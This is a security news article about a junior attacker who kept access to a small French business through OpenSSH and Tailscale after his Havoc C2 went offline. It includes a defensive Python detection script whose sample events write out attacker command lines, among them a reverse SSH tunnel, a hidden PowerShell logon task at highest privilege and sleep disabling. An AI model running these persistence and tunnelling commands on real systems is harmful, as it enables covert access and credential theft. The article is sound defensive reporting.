Junior Hacker Leverages Tailscale and OpenSSH for Persistent Access After C2 Shutdown


In a recent cybersecurity incident, a French-speaking attacker infiltrated a small automotive business in France, deploying a keylogger to harvest sensitive banking and email credentials. This breach, while seemingly routine, took a notable turn when the attacker implemented a strategy that ensured continued access even after the primary command-and-control (C2) server was taken offline.

Before the C2 server ceased operations, the attacker, known by the handle “Poisson,” installed OpenSSH and Tailscale on the compromised machine. This maneuver created a persistent backdoor that did not rely on the C2 infrastructure. When the Havoc server went dark the following day, Poisson’s access remained intact. Eighteen days later, when the C2 reactivated, the compromised machines automatically reconnected, allowing the attacker to continue operations seamlessly.

Cato Networks meticulously documented this operation, capturing 339 commands executed over 33 days. The attacker inadvertently left behind SSH keys and a detailed playbook in an unsecured storage bucket. This analysis, conducted by Cato CTRL researcher Vitaly Simonovich, provides a rare glimpse into the operational tactics of the attacker, focusing on the commands executed rather than forensic remnants typically analyzed post-breach.

The key takeaway from this incident is clear: simply taking down a C2 server does not equate to effective remediation if the attacker has established alternate access points.

The Profile of Poisson

Poisson is characterized not as an advanced persistent threat (APT) but rather as a junior operator. Researchers noted that his activities followed a school-like schedule, primarily active after 3 p.m. CET, with significant breaks during the day. His operations relied on free-tier services including DuckDNS, Backblaze B2, and an inexpensive IONOS VPS located in Berlin. His operational security was notably weak; he exposed his home directory multiple times, named storage buckets after his handle, and even left a test file containing repeated keystrokes within the keylogger package. Despite these missteps, he successfully compromised four machines.

The Attack Chain

The malware utilized in this attack operated almost entirely in memory. It began with a VBScript stager that included a sandbox-evasion delay, which decrypted a PowerShell loader. This loader subsequently fetched a .NET loader that executed Havoc’s Demon agent without writing the implant to disk. For privilege escalation, Poisson employed the Start-Process -Verb RunAs command, which triggered the Windows User Account Control (UAC) prompt, requiring user interaction to proceed. In one instance, this process required a dozen attempts over two days.

Following initial access, Poisson established a scheduled task that executed at every logon with elevated privileges, injected shellcode into Explorer.exe, and utilized a custom-built RustDesk as a backup communication channel. The keylogger, a concise 70-line Python script, recorded keystrokes to a local file without any beaconing or exfiltration server. Poisson manually retrieved the logged data and adjusted power settings to prevent the machines from entering sleep mode, ensuring uninterrupted data collection.

The Strategic Move

On April 7, during an extensive overnight session, Poisson installed OpenSSH Server and Tailscale, integrating the victim’s machine into his private Tailscale network. This setup enabled key-based SSH access and established a reverse tunnel, allowing him to connect to the machine through Tailscale’s encrypted network without relying on the C2 or exposing any ports.

The following day, the Havoc infrastructure went offline. While the reason for this outage remains unclear, it was inconsequential; the Tailscale connection remained operational, preserving the attacker’s access.

When the C2 resumed on April 26, the compromised machines reconnected automatically, eliminating the need for re-exploitation. Over the next five days, Poisson executed an additional 145 commands, probing smart-card and certificate stores—indicative of his interest in certificate-based logins. He also ran two unidentified executables from a file named Thales.zip for approximately 32 minutes before deleting 17 files and ceasing activity on May 1.

The attacker’s objectives were narrow and focused. He did not deploy tools like Mimikatz for lateral movement or ransomware; instead, he sought specific data: banking logins, email passwords, and access to government portals. For a small business owner, this represents a significant financial risk.

Implications of the Attack

The tools employed by Poisson were not novel, highlighting a concerning trend in cybercrime. Notably, China’s APT31 utilized Tailscale to create covert tunnels from Russian IT firms in 2024 and 2025. Similarly, the group Scattered Spider has leveraged legitimate remote-access tools such as Ngrok and Fleetdeck. RustDesk, which served as Poisson’s backup channel, has also been associated with recent Akira ransomware incidents.

The binaries used in this attack were legitimate and signed, underscoring the challenge of detection methods that focus solely on identifying malicious files rather than monitoring for anomalous behaviors. Poisson’s operation provides concrete evidence that even when a C2 is dismantled, the attacker can maintain access through alternative means, often executed by individuals still refining their skills.

Recommendations for Detection and Prevention

Cato Networks has outlined several key indicators for organizations to monitor:

  • Alert for installations of OpenSSH Server on Windows workstations, which are rarely legitimate.
  • Monitor for tailscale.exe on machines that should not require a VPN.
  • Identify reverse SSH tunnels (ssh -R) connecting to external hosts.
  • Check for instances of wscript.exe executing VBScript files from user staging folders.
  • Flag scheduled tasks set to the highest privileges that initiate script interpreters.
  • Watch for changes in powercfg settings that prevent machines from entering standby.
  • Block DuckDNS to mitigate potential abuse.
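The indicators above translate directly into host-telemetry rules. The script below is an added example written for this article, not Cato Networks' detection content and not tooling from the incident: it runs the seven checks over a handful of constructed Sysmon-style process-creation and DNS-query records (hostnames, users and command lines are invented for the example; the `TAILSCALE_ALLOWED_HOSTS` allowlist is an assumption standing in for an organization's own inventory) and returns one finding per matching rule.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Hosts where a Tailscale client is expected (constructed allowlist for the example).
TAILSCALE_ALLOWED_HOSTS = {"it-admin-laptop"}

# Interpreters a highest-privilege scheduled task should not normally launch.
SCRIPT_INTERPRETERS = ("powershell", "pwsh", "wscript", "cscript", "mshta", "cmd")

# .vbs launched from a user-writable staging folder (Temp or Downloads).
USER_STAGING_VBS = re.compile(
    r'\\Users\\[^\\]+\\(AppData\\Local\\Temp|Downloads)\\[^\s"]+\.vbs', re.I)
# ssh -R <spec>: a reverse tunnel.
SSH_REVERSE = re.compile(r"(^|\s)-R\s+\S+")
# schtasks ... /rl highest, and the /tr action it registers.
SCHTASKS_HIGHEST = re.compile(r"schtasks.*?/rl\s+highest", re.I)
TASK_ACTION = re.compile(r'/tr\s+"?([^"]*)"?', re.I)
# powercfg setting a sleep/standby timeout to 0 (never).
POWERCFG_NO_SLEEP = re.compile(
    r"powercfg(\.exe)?\s+[/-](change|x)\s+(standby|hibernate|monitor)-timeout-(ac|dc)\s+0\b", re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    evidence: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[Finding]:
    """Apply every rule to one event; an event may trip more than one rule."""
    host = ev["host"]
    out: list[Finding] = []
    if ev["type"] == "dns":
        if ev["query"].lower().endswith(".duckdns.org"):
            out.append(Finding(host, "dyndns_duckdns", ev["query"]))
        return out

    image, cmd = basename(ev["image"]), ev["cmdline"]
    low = cmd.lower()
    if image == "sshd.exe" or "openssh.server" in low:
        out.append(Finding(host, "openssh_server_on_workstation", cmd))
    if image in ("tailscale.exe", "tailscaled.exe") and host not in TAILSCALE_ALLOWED_HOSTS:
        out.append(Finding(host, "unexpected_tailscale", cmd))
    if image == "ssh.exe" and SSH_REVERSE.search(cmd):
        out.append(Finding(host, "reverse_ssh_tunnel", cmd))
    if image == "wscript.exe" and USER_STAGING_VBS.search(cmd):
        out.append(Finding(host, "vbscript_from_user_staging", cmd))
    if image == "schtasks.exe" and SCHTASKS_HIGHEST.search(cmd):
        action = TASK_ACTION.search(cmd)
        if action and any(i in action.group(1).lower() for i in SCRIPT_INTERPRETERS):
            out.append(Finding(host, "highest_priv_task_runs_interpreter", cmd))
    if image == "powercfg.exe" and POWERCFG_NO_SLEEP.search(cmd):
        out.append(Finding(host, "sleep_disabled", cmd))
    return out


def scan(events: list[dict]) -> list[Finding]:
    return [f for ev in events for f in check_event(ev)]


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry, loosely modelled on Sysmon EID 1 / EID 22 fields.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Program Files\Tailscale\tailscale.exe", "cmdline": "tailscale.exe up"},
    {"type": "process", "host": "it-admin-laptop", "user": "shop\\admin",
     "image": r"C:\Program Files\Tailscale\tailscale.exe", "cmdline": "tailscale.exe status"},
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:localhost:22 relay@203.0.113.10"},
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\marie\AppData\Local\Temp\invoice.vbs"'},
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Updater" /tr "powershell.exe -w hidden -f C:\Users\marie\AppData\Roaming\u.ps1" /sc onlogon /rl highest'},
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Windows\System32\powercfg.exe", "cmdline": "powercfg.exe /change standby-timeout-ac 0"},
    {"type": "dns", "host": "ws-accounting-01", "query": "example-host.duckdns.org"},
    {"type": "process", "host": "ws-accounting-01", "user": "shop\\marie",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": r"notepad.exe C:\Users\marie\Documents\notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}: {f.evidence}")
```

Each rule keys on the process image rather than on a signature, which is the point the article makes about signed, legitimate binaries: none of these events would be flagged by file-based scanning, but together they describe exactly the persistence chain the C2 takedown left in place.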

The overarching lesson is that discovering a C2 should prompt a broader investigation into potential persistence mechanisms that may have been established.

The contents of Thales.zip and the purpose of the two executables run during the attack remain unanswered questions. However, the critical insight is that the C2 was merely one entry point into the network. If it is removed while leaving OpenSSH, Tailscale, the scheduled tasks, and the keylogger intact, the attacker retains a pathway back into the system.

For further insights into the evolving landscape of cyber threats, refer to the original analysis. Source: thehackernews.com.
